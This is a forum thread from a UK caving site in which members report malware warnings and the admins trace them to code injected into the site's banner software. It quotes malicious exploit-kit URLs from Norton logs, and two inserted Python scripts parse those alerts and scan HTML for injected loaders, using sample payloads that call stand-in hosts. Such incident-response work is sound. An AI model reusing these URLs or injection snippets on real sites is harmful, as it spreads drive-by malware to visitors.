Author Topic: Virus attack  (Read 7719 times)

Online Laurie

  • forum hero
  • *****
  • Posts: 1722
  • MNRC
Virus attack
« on: December 28, 2012, 12:06:48 pm »
Earlier today my anti-virus software locked me out of the forum.
Seems OK now.
Has someone dealt with it?
2015 - Green insurance card swapped for a red one :(

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #1 on: December 28, 2012, 12:33:16 pm »
My Kaspersky threw up a "Trojan  -  access denied" flash when I logged on just now. 

For the backroom boys' info, it is logged as being at http://domaingranted(dot)net(slash)B6jsr(and a lot of other stuff)...UkK17p8b/pdfx(dot)html

I can provide the missing bit in the middle if anyone needs it.

Roger
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkien: "The Hobbit"

Offline bograt

  • forum hero
  • *****
  • Posts: 3509
  • Speliodecrepit
Re: Virus attack
« Reply #2 on: December 28, 2012, 12:54:52 pm »
My Norton AV nobbled the same one when I first logged on to this site today as well.
Aim low, achieve your goals, avoid disappointment

Offline rhychydwr1

  • forum hero
  • *****
  • Posts: 3004
  • Russian, the best
    • http://www.showcaves.com
Re: Virus attack
« Reply #3 on: December 28, 2012, 12:55:40 pm »
Same happened to me but AVIS wiped it.

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #4 on: December 28, 2012, 04:43:34 pm »
Just logged back on again, another "malicious url" denied...

Looks like we're under attack...    >:(
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkien: "The Hobbit"

Offline Anon

  • Nobody
  • Newbie
  • *
  • Posts: 2
Re: Virus attack
« Reply #5 on: December 28, 2012, 05:26:13 pm »
Can't say I've noticed anything, are the above using IE?

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #6 on: December 28, 2012, 05:38:38 pm »
Can the people who've had this issue please give as much information as they can?

e.g.

- full error message from the AV software
- which AV software
- which browser (+version)
- OS

I've not noticed anything untoward at all whilst using the site using FF17 on Windows and I do run AV and anti-malware scanners.
=:blubba:=

[ nsfw ]

Offline graham

  • Retired
  • forum hero
  • *****
  • Posts: 10943
  • UBSS, Speleo-Club de Perigueux, GSG, SUI
    • UBSS
Re: Virus attack
« Reply #7 on: December 28, 2012, 07:09:58 pm »
Me too, FF17.0.1 & no problems (except with the mod who doesn't have a sense of humour.)
Caving is for Life not just for Christmas

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #8 on: December 28, 2012, 07:29:18 pm »
Using IE9 and Kaspersky Internet Security 2012.

Operating system:  Windows 7

Have logged on and off again 3/4 times today.

First time, Kaspersky denied a Trojan (HEUR: Trojan.Script.Generic):

http://domaingranted( dot )net/B6jsra0jwqq01bI80( I'm putting a gap in here 'cos I don't want to risk posting an active doodah )WW0ggsq0sMbY0ZEjJ0IN6J0XwG10OxND0jymk0YRv009FiY0icJw172l30QUkK17p8b/pdfx( dot )html

Next two times, denied phishing URL:

http://rtffeatureand( dot )org/5u3FLR02z3b0eRLx0GQu( space as before )T0e4DX0LicG0fcJB0zCua0Dwyt0NK3o05i1Y0Obm30ugiq11e7V0yH0w0WQei0N0PK/

This last time, got the phishing URL when I went on UKCaving and then the Trojan when I actually logged on.

Roger
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkien: "The Hobbit"

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #9 on: December 28, 2012, 08:08:20 pm »
The two domains (domaingranted and rtffeatureand) both seem to be dodgy URLs (Chrome flags them as malicious), as correctly identified by your copy of Kaspersky, which is why it's doing its job blocking them.

The question is why are you getting these when you're using ukcaving?

Is ukcaving.com the only site that is causing this issue? It might be worth trying some other randomly chosen SMF based forums that are unrelated, for example: this one or this one  - do either of these throw up problems?

Have you tried using a different browser like Firefox or Chrome? Same issues?

I'm running Win 7 and have checked ukcaving using IE9 without issue. I've also checked for any server changes and can't see any.

I'm not by any means a web security expert but when we've had problems like this before it's generally down to the user's machine being infected by some adware/malware.

I would suggest using your AV to do a full system scan. I would also download and do a full scan using Malwarebytes Anti Malware and something like Spybot

If all that comes back negative then we probably have an issue on the server but given that some of us are using the site without issue I'm inclined to think that perhaps your machine has a nasty on it.  I'm sorry if this isn't what you want to hear but I hope I'm right and the server hasn't been compromised.

=:blubba:=

[ nsfw ]

Offline flexx

  • regular
  • *
  • Posts: 31
  • ChCC
Re: Virus attack
« Reply #10 on: December 28, 2012, 10:36:32 pm »
Just checked my unread posts since last visit and AVG blocked a Trojan.

Offline Alex

  • forum hero
  • *****
  • Posts: 3489
  • BRCC, UWFRA.
Re: Virus attack
« Reply #11 on: January 02, 2013, 10:12:38 pm »
I ended up with a virus at around that date; did not think UKcaving caused it, it could have been unrelated, but I spent a good 4 hours getting rid of it and restoring firewalls etc. It was a nasty virus that infected services.exe, which of course crashed the computer when AVG tried to remove it. With that fixed (from a Windows 7 CD) I had to spend several hours restoring my firewall, Windows Defender and other services the virus messed with.
Anything I say represents my own opinion and not that of any club/organisation that I am a member of (unless it's good of course)

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #12 on: January 03, 2013, 10:09:27 am »
I ran a full scan with Kaspo and the Windows Defender thingy - both came up negative.  Cleared everything out on IE9 and seem to have got rid of the problem - fingers crossed.
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkien: "The Hobbit"

Offline bograt

  • forum hero
  • *****
  • Posts: 3509
  • Speliodecrepit
Re: Virus attack
« Reply #13 on: January 03, 2013, 01:17:42 pm »
I have had no recurrence since Norton zapped it.
Aim low, achieve your goals, avoid disappointment

Offline danthecavingman

  • forum star
  • ****
  • Posts: 665
  • Don't follow too close.....
Re: Virus attack
« Reply #14 on: June 14, 2013, 07:28:52 pm »
Evening all, just now from my Norton 360 as I logged in:

Category: Intrusion Prevention
Date & Time, 2013-06-14 19:18:52
Risk, High
Activity,An intrusion attempt by 53df:7d06::0 was blocked
Status,Blocked
Recommended Action,No Action Required
IPS Alert Name,Web Attack: Java CVE-2013-2423 RCE
Default Action,No Action Required
Action Taken,No Action Required
Attacking Computer,"53df:7d06::0, 80"
Attacker URL,"www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=atom.jar&k=5358709419027932&h=bc5c75e226ea4554"
Destination Address, "c0a8:146::801:740a:80fa:ffff, 50442",
Source Address, 53df:7d06::0
Traffic Description "TCP, www-http"
Network traffic from www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=atom.jar&k=5358709419027932&h=bc5c75e226ea4554 matches the signature of a known attack.  The attack was resulted from \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE.
To stop being notified for this type of traffic, in the Actions panel, click Stop Notifying Me.

You see that Taxus baccata.........that's Yew that is........

Offline danthecavingman

  • forum star
  • ****
  • Posts: 665
  • Don't follow too close.....
Re: Virus attack
« Reply #15 on: June 14, 2013, 07:40:29 pm »
Guys,

This as well....

Category: Intrusion Prevention
Date & Time, 2013-06-14 19:18:52
Risk, High
Activity,An intrusion attempt by 53df:7d06::0 was blocked
Status, Blocked
Recommended Action, No Action Required
IPS Alert Name, Web Attack: Malicious Java File Download 9
Default Action, No Action Required
Action Taken, No Action Required
Attacking Computer, 53df:7d06::0, 80
Attacker URL, www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=site.jar&k=5358709419027910&h=bc5c75e226ea4554
Destination Address, c0a8:146::801:740a:80fa:ffff, 50443
Source Address, 53df:7d06::0
Traffic Description TCP, www-http
Network traffic from www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=site.jar&k=5358709419027910&h=bc5c75e226ea4554 matches the signature of a known attack.  The attack was resulted from \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE.  To stop being notified for this type of traffic, in the Actions panel, click Stop Notifying Me.

You see that Taxus baccata.........that's Yew that is........
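An added example (my own code, not Norton's and not anything the forum posted) that parses the two alerts above the way an incident responder would before pivoting on them: it pulls out the signature name, the serving host and path, the `f=`/`k=`/`h=` parameters, the endpoints and the local process that made the request, then groups alerts by landing page. It assumes the `Key, value` line layout shown in the posts. It also assumes that the IPv6-looking endpoints are IPv4 addresses written as hex in the first two groups; that is an inference of mine, supported only by the destination decoding to a private 192.168.x.x address, and not something the page or Norton's documentation states.

```python
"""Pull indicators out of Norton 360 Intrusion Prevention alerts like the two
quoted above.  Added example; the field layout is taken from the posts."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed input: the two alerts from the thread, trimmed to the lines this
# parser uses, with the forum's <b> tags dropped.
ALERTS = [
    r"""Category: Intrusion Prevention
Date & Time, 2013-06-14 19:18:52
Activity,An intrusion attempt by 53df:7d06::0 was blocked
IPS Alert Name,Web Attack: Java CVE-2013-2423 RCE
Attacking Computer,"53df:7d06::0, 80"
Attacker URL,"www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=atom.jar&k=5358709419027932&h=bc5c75e226ea4554"
Destination Address, "c0a8:146::801:740a:80fa:ffff, 50442",
The attack was resulted from \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE.
""",
    r"""Category: Intrusion Prevention
Date & Time, 2013-06-14 19:18:52
Activity,An intrusion attempt by 53df:7d06::0 was blocked
IPS Alert Name, Web Attack: Malicious Java File Download 9
Attacking Computer, 53df:7d06::0, 80
Attacker URL, www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=site.jar&k=5358709419027910&h=bc5c75e226ea4554
Destination Address, c0a8:146::801:740a:80fa:ffff, 50443
The attack was resulted from \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE.
""",
]

# "Key, value", "Key,value", "Key: value" or 'Key "value"'; narrative lines do
# not match and are skipped.
FIELD = re.compile(r'^([A-Za-z &]+?)\s*(?:[:,]\s*|(?="))(.*)$')
PROCESS = re.compile(r"resulted from (.+?)\.(?:\s|$)")


def parse_fields(text):
    fields = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            value = m.group(2).strip().rstrip(",").strip().strip('"')
            fields[m.group(1).strip()] = value
    return fields


def hex_groups_to_ipv4(addr):
    """'53df:7d06::0' -> '83.223.125.6'.  Assumption (not stated on the page):
    the first two 16-bit groups are an IPv4 address in hex.  The destination
    decoding to the private address 192.168.1.70 is what makes this reading
    plausible."""
    hi, lo = addr.split(":")[:2]
    return str(ipaddress.IPv4Address((int(hi, 16) << 16) | int(lo, 16)))


def parse_endpoint(value):
    addr, port = value.rsplit(",", 1)
    return hex_groups_to_ipv4(addr.strip()), int(port)


def parse_url(url):
    if "://" not in url:          # the alert omits the scheme
        url = "http://" + url
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return parts.hostname, parts.path, query


def summarize(alert):
    f = parse_fields(alert)
    host, path, query = parse_url(f["Attacker URL"])
    attacker_ip, attacker_port = parse_endpoint(f["Attacking Computer"])
    victim_ip, victim_port = parse_endpoint(f["Destination Address"])
    proc = PROCESS.search(alert)
    return {
        "time": f.get("Date & Time"),
        "signature": f["IPS Alert Name"],
        "attacker_ip": attacker_ip, "attacker_port": attacker_port,
        "victim_ip": victim_ip, "victim_port": victim_port,
        "host": host, "path": path, "query": query,
        "process": proc.group(1) if proc else None,
    }


def analyze_all(alerts=ALERTS):
    return [summarize(a) for a in alerts]


def pivot(summaries):
    """Group by serving host+path and list the payloads requested there.  The
    same .cache/ URL handing out different jars a second apart is one
    exploit-kit landing page, not two unrelated hits."""
    kits = {}
    for s in summaries:
        kits.setdefault((s["host"], s["path"]), []).append(s["query"].get("f"))
    return kits


if __name__ == "__main__":
    results = analyze_all()
    for r in results:
        print(r["time"], r["signature"], r["attacker_ip"], r["query"], r["process"])
    print(pivot(results))
```

The grouped view is the useful bit: one compromised magazine site, one `.cache/` directory under a TinyMCE plugin path, two different jars requested by `java.exe` with the same `h=` token, which is what you would hand to whoever owns that site and what you would block on at the proxy.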

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #16 on: June 14, 2013, 08:33:17 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.
=:blubba:=

[ nsfw ]

Online RobinGriffiths

  • junky
  • ****
  • Posts: 828
Re: Virus attack
« Reply #17 on: June 14, 2013, 08:58:25 pm »
tiny_mce is a WYSIWYG browser-based HTML editor. I've used it in the past at work. The URL at which the JavaScript is referenced might be compromised?

Offline AR

  • Black shadow
  • junky
  • ****
  • Posts: 863
  • PDMHS, ATAC, ANHMS
Re: Virus attack
« Reply #18 on: June 14, 2013, 10:52:32 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.

Seconded, Oracle are notoriously slack at sorting the vulnerabilities in JRE. If you're on Firefox, the NoScript add-in is worth having too!
Dirty old mines need love too....

Offline mmilner

  • Experienced digging / conservation juggling
  • forum hero
  • *****
  • Posts: 1169
  • Outside Handshake Cave, Manifold Valley.
    • Darfar P.C. web site
Re: Virus attack
« Reply #19 on: June 14, 2013, 11:29:10 pm »
tiny_mce is a WYSIWYG browser-based HTML editor. I've used it in the past at work. The URL at which the JavaScript is referenced might be compromised?

Certain versions of tiny_mce are well known to web developers like myself for having exploits and vulnerabilities. Upgrade to later versions or stop using them.

Regards, Mel.
Norbert Casteret (Ten Years Under the Earth) and Pierre Chevalier (Subterranean Climbers) were my inspiration to start caving. (And I'm still doing it.) Secretary, Darfar Potholing Club, the Peak District.

Offline underground

  • junky
  • ****
  • Posts: 809
Re: Virus attack
« Reply #20 on: June 15, 2013, 08:05:45 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.
Interesting, I'm sick of java autoupdater, is that a general recommendation or specific to this issue dude?

Offline graham

  • Retired
  • forum hero
  • *****
  • Posts: 10943
  • UBSS, Speleo-Club de Perigueux, GSG, SUI
    • UBSS
Re: Virus attack
« Reply #21 on: June 15, 2013, 08:13:26 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.
Interesting, I'm sick of java autoupdater, is that a general recommendation or specific to this issue dude?

It's a general recommendation. Java is hellishly buggy and full of exploitable problems. Trouble is I have one very specific need for it.

P.S. Does this mean I am a 'dude'?   :-\
Caving is for Life not just for Christmas

Offline estelle

  • obsessive maniac
  • ***
  • Posts: 450
  • GSG & BEC - Everything to Excess!
Re: Virus attack
« Reply #22 on: June 16, 2013, 09:20:59 pm »
google chrome just warned me not to come here too for risk of malware... firefox didn't have a problem though!
What you say about me says more about you than it does about me.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #23 on: June 16, 2013, 09:47:23 pm »
We've had a few such reports in the last few days.  I can access the site using IE/FF/Chrome with no issues so I don't believe it's an issue with the server, possibly a false alarm with Chrome.

Thanks for the warning anyway...
=:blubba:=

[ nsfw ]

Offline bagpuss

  • obsessive maniac
  • ***
  • Posts: 473
Re: Virus attack
« Reply #24 on: June 16, 2013, 09:50:40 pm »
google chrome just warned me not to come here too for risk of malware... firefox didn't have a problem though!

I've got the same thing with Chrome & also my virus checker..

Offline ttxela

  • junky
  • ****
  • Posts: 796
  • WCMS, PDMHS
Re: Virus attack
« Reply #25 on: June 16, 2013, 09:51:54 pm »
Sophos warns that it's blocked malware when I access the site and every time I move to a new page within the site  :-\

Mal/HTML -GenA whatever that means  ::)
If you've been affected by any of the issues raised in this post you can contact our helpline on 0800........

Offline Anon

  • Nobody
  • Newbie
  • *
  • Posts: 2
Re: Virus attack
« Reply #26 on: June 16, 2013, 09:57:28 pm »
Chrome threw up a malware warning for me too.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #27 on: June 16, 2013, 10:02:33 pm »
All of a sudden, we're getting a load of these this evening...

Weird coz I don't have an issue using IE, FF or Chrome.

Not sure if this is a false alert or there is a genuine issue. Will investigate...
=:blubba:=

[ nsfw ]

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #28 on: June 16, 2013, 10:03:44 pm »
Just accessed ukbouldering/ukcaving using Chrome and I don't get any message...weird
=:blubba:=

[ nsfw ]

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #29 on: June 16, 2013, 10:14:22 pm »
Ok, Toby (site overlord) has done some digging and it appears that this problem has been caused by an old (3 years) post on ukbouldering.com linking to a site that is now serving malware.

Because ukbouldering.com and ukcaving.com are served from the same IP, we have been flagged as well.

I'm confident that this is a non-issue and you can carry on using the site as usual.
=:blubba:=

[ nsfw ]

Offline menacer

  • junky
  • ****
  • Posts: 987
  • Craven Pothole Club
Re: Virus attack
« Reply #30 on: June 17, 2013, 08:37:28 am »
I would like to thank whoever or whatever evil bot or link caused this. Chris aka the cap'n has not been able to get on the site with either FF or Chrome (because he didn't read the info properly.. shhhh). I'm getting loads done round the house in this downtime. :thumbsup:

PS I'm using Safari on the iPad, no problems
Chaos, panic, and disorder - my work here is done.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #31 on: June 17, 2013, 08:43:28 am »
We're confident that this has now been fixed.

Browsers may continue to flag the site as malicious for some time though...
=:blubba:=

[ nsfw ]

Offline mrodoc

  • forum hero
  • *****
  • Posts: 2341
    • Peter Glanvill's Webpage
Re: Virus attack
« Reply #32 on: June 17, 2013, 09:12:50 am »
Same here this am.

Offline mmilner

  • Experienced digging / conservation juggling
  • forum hero
  • *****
  • Posts: 1169
  • Outside Handshake Cave, Manifold Valley.
    • Darfar P.C. web site
Re: Virus attack
« Reply #33 on: June 17, 2013, 09:19:44 am »
google chrome just warned me not to come here too for risk of malware... firefox didn't have a problem though!

I've got the same thing with Chrome & also my virus checker..

I got the same thing with Firefox and my normal Linux system that I use every day. I disconnected my t-mobile broadband dongle, reconnected it and the forum came up no problem! Maybe IP address related?
Norbert Casteret (Ten Years Under the Earth) and Pierre Chevalier (Subterranean Climbers) were my inspiration to start caving. (And I'm still doing it.) Secretary, Darfar Potholing Club, the Peak District.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #34 on: June 17, 2013, 09:37:00 am »
The problem was with the software that feeds the banner adverts into the forum.  Somebody had managed to insert some code into the database that pulled in some malicious code from a third party website.

The code has now been removed and the advert software patched to the latest version.
=:blubba:=

[ nsfw ]

Offline mmilner

  • Experienced digging / conservation juggling
  • forum hero
  • *****
  • Posts: 1169
  • Outside Handshake Cave, Manifold Valley.
    • Darfar P.C. web site
Re: Virus attack
« Reply #35 on: June 17, 2013, 10:29:37 am »
Nice one!  :thumbsup:

I had a similar problem with a clients web site. He had inserted some code via the wysiwyg editor pulling in similar stuff. I removed that and all was well again!
Norbert Casteret (Ten Years Under the Earth) and Pierre Chevalier (Subterranean Climbers) were my inspiration to start caving. (And I'm still doing it.) Secretary, Darfar Potholing Club, the Peak District.
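Both the banner-software injection bubba describes (code inserted into the database that pulled a script from a third-party site) and the WYSIWYG-editor case mmilner mentions come down to the same thing: stored HTML that quietly loads code from a host the site does not own. An added example, not the forum's ad software or either poster's code, of the check an admin can run over such stored HTML before restoring a site: it flags script/iframe/object/embed tags whose source is off the site's own host allowlist, iframes sized or styled to be invisible, and inline scripts built with the `document.write`/`unescape`/`eval` tricks these injections use. The allowlist, the table rows and the injected snippets are constructed for illustration.

```python
"""Scan HTML rows from an ad/banner (or post) table for injected remote
loaders.  Added example; the rows below are constructed, not real data."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the site's first-party hosts.  Anything else loading code is a finding.
ALLOWED_HOSTS = {"ukcaving.com", "www.ukcaving.com"}

# Constructed sample rows standing in for the banner table: one clean banner,
# one with an appended remote script, one with a hidden iframe, one with an
# obfuscated inline loader.
BANNERS = {
    1: '<a href="http://www.ukcaving.com/shop"><img src="/ads/shop.png" alt="shop"></a>',
    2: '<img src="/ads/gear.png"><script src="http://evil.example/loader.js"></script>',
    3: '<div><iframe src="http://bad.example/pdfx.html" width="1" height="1" '
       'style="visibility:hidden"></iframe></div>',
    4: '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//bad.example/x%22%3E"))</script>',
}

LOADER_TAGS = {"script", "iframe", "object", "embed"}
SUSPECT_INLINE = re.compile(r"document\.write|unescape\(|eval\(|fromCharCode", re.I)


def _hidden(attrs):
    """Iframe made invisible by style or by 0/1 pixel dimensions."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    dims = (attrs.get("width"), attrs.get("height"))
    return any(d is not None and d.strip().isdigit() and int(d) <= 1 for d in dims)


class LoaderScanner(HTMLParser):
    def __init__(self, allowed):
        super().__init__()
        self.allowed = allowed
        self.findings = []      # list of (kind, detail)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        if tag in LOADER_TAGS:
            src = a.get("src") or a.get("data")
            if src:
                host = urlsplit(src).hostname   # None for relative paths
                if host and host not in self.allowed:
                    self.findings.append(("remote-" + tag, src))
        if tag == "iframe" and _hidden(a):
            self.findings.append(("hidden-iframe", a.get("src", "")))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands <script> bodies to handle_data untouched.
        if self._in_script and SUSPECT_INLINE.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan_banner(html, allowed=ALLOWED_HOSTS):
    p = LoaderScanner(allowed)
    p.feed(html)
    p.close()
    return p.findings


def scan_table(rows=BANNERS, allowed=ALLOWED_HOSTS):
    """Return {row_id: findings} for rows that have any finding."""
    flagged = {}
    for row_id, html in rows.items():
        findings = scan_banner(html, allowed)
        if findings:
            flagged[row_id] = findings
    return flagged


if __name__ == "__main__":
    for row_id, findings in scan_table().items():
        print(row_id, findings)
```

Run this over a dump of the relevant table before and after the cleanup; an empty result after is the evidence to attach to the Safe Browsing review request. Plain links to other sites (row 1) are deliberately not flagged, since a hyperlink does not execute anything in the visitor's browser.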

Offline ah147

  • forum star
  • ****
  • Posts: 701
Re: Virus attack
« Reply #36 on: June 17, 2013, 12:42:09 pm »
I'm still getting issues with it. Is there anything I/admin can do to stop the problem occurring?

Chrome, windows 7

Offline graham

  • Retired
  • forum hero
  • *****
  • Posts: 10943
  • UBSS, Speleo-Club de Perigueux, GSG, SUI
    • UBSS
Re: Virus attack
« Reply #37 on: June 17, 2013, 12:56:01 pm »

The code has now been removed and the advert software patched to the latest version.


Interesting, 'cos it is only now showing as an attack site for me.  :-\
Caving is for Life not just for Christmas

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #38 on: June 17, 2013, 12:57:03 pm »
The problem has been fixed, however this takes time to be recognised by the bodies that flag sites as bad so it'll still come up with the warning until we've been whitelisted again.

No idea how long this takes but for now the site is safe to use.
=:blubba:=

[ nsfw ]

Offline marlboroman

  • Newbie
  • *
  • Posts: 9
Re: Virus attack
« Reply #39 on: June 17, 2013, 01:12:05 pm »
Today is the first time I've seen the warning; I had to try a few different things to get on the site to post. This is the information I got from the message; it seems to be this site that is compiling the lists of untrusted sites: https://www.stopbadware.org
In full, as it seems I can't attach a file:

Diagnostic page for ukcaving.com
What is the current listing status for ukcaving.com?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 40 pages we tested on the site over the past 90 days, 20 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-06-16, and the last time suspicious content was found on this site was on 2013-06-16.
This site was hosted on 1 network(s) including AS6428 (CDM).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, ukcaving.com did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

Diagnostic page for AS6428 (CDM)
What happened when Google visited sites hosted on this network?
Of the 871 site(s) we tested on this network over the past 90 days, 57 site(s), including, for example, ukbouldering.com/, babesandtoys.com/, topdogbreeders.com/, served content that resulted in malicious software being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2013-06-16, and the last time suspicious content was found was on 2013-06-16.
Has this network hosted sites acting as intermediaries for further malware distribution?
Over the past 90 days, we found 7 site(s) on this network, including, for example, erosdiva.com/, villasexxx.com/, mikespr0nsitereviews.com/, that appeared to function as intermediaries for the infection of 10 other site(s) including, for example, picnapper.com/, inew.ru/, sesso-internet.com/.
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 6 site(s), including, for example, openeros.com/, lapeches.com/, egmontkeyferry.com/, that infected 10 other site(s), including, for example, tinyurl.com/, search-metrotampabay.com/, sesso-internet.com/.
Next steps:
Return to the previous page.


Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #40 on: June 17, 2013, 02:09:56 pm »
Yep, I've already contacted them to request we're removed from their blacklist, but I suspect it relies on Toby contacting Google first and he's away from his computer at the moment.
=:blubba:=

[ nsfw ]

Offline kay

  • Not a
  • forum hero
  • *****
  • Posts: 2536
Re: Virus attack
« Reply #41 on: June 17, 2013, 10:05:52 pm »

I'm confident that this is a non-issue and you can carry on using the site as usual.

Trouble is, only way to find out that you can still use it is to ignore the warnings and use it anyway  :tease:
getstats - A society in which our lives and choices are enriched by an understanding of statistics. Go to www.getstats.org.uk for more information

Offline Duncan Price

  • forum star
  • ****
  • Posts: 530
Re: Virus attack
« Reply #42 on: June 17, 2013, 10:28:08 pm »
IPS Alert Name,Web Attack: Java CVE-2013-2423 RCE

Just cleared this one as well.  Took two full scans and disabling Java to nuke it.

In other news, I recently had my (dormant) Yahoo! account compromised and have since been spammed from other cavers' Yahoo! accounts.  See here

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #43 on: June 17, 2013, 11:03:09 pm »

I'm confident that this is a non-issue and you can carry on using the site as usual.

Trouble is, only way to find out that you can still use it is to ignore the warnings and use it anyway  :tease:

Very true Kay :)

I recommend using Sandboxie for this sort of thing if it happens again...you can then proceed to ignore all the virus/malware warnings safe in the knowledge that your computer can't be compromised.
=:blubba:=

[ nsfw ]

Offline ah147

  • forum star
  • ****
  • Posts: 701
Re: Virus attack
« Reply #44 on: June 17, 2013, 11:16:44 pm »
Just logged in no issues!  ;D

Offline kay

  • Not a
  • forum hero
  • *****
  • Posts: 2536
Re: Virus attack
« Reply #45 on: June 18, 2013, 08:09:19 am »
Just logged in no issues!  ;D

Same here - looks like your good name has been restored!
getstats - A society in which our lives and choices are enriched by an understanding of statistics. Go to www.getstats.org.uk for more information